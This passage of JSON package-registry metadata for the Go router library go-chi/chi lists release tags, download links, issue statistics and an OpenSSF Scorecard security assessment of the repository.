4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.101Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.1539007058442765,"dependent_packages_count":4.8292980109755685,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.991599358409923},"purl":"pkg:golang/github.com/%21go-%21c%21h%21i/chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/Go-CHI/chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/Go-CHI/chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/Go-CHI/chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-CHI%2Fchi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-CHI%2Fchi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-CHI%2Fchi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-CHI%2Fchi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-CHI%2Fchi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-CHI%2Fchi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":8358276,"name":"github.com/go-chi/Chi","ecosystem":"go","description":"","homepage":"https://github.com/go-chi/Chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/Chi","keywords_array":[],"namespace":"github.com/go-chi","versions_count":8,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2023-09-07T09:35:12.000Z","latest_release_number":"v1.5.5","last_synced_at":"2026-08-12T02:06:19.135Z","created_at":"2023-09-30T02:04:38.665Z","updated_at":"2026-08-12T02:06:19.135Z","registry_url":"https://pkg.go.dev/github.com/go-chi/Chi","install_command":"go get github.com/go-chi/Chi","documentation_url":"https://pkg.go.dev/github.com/go-chi/Chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","p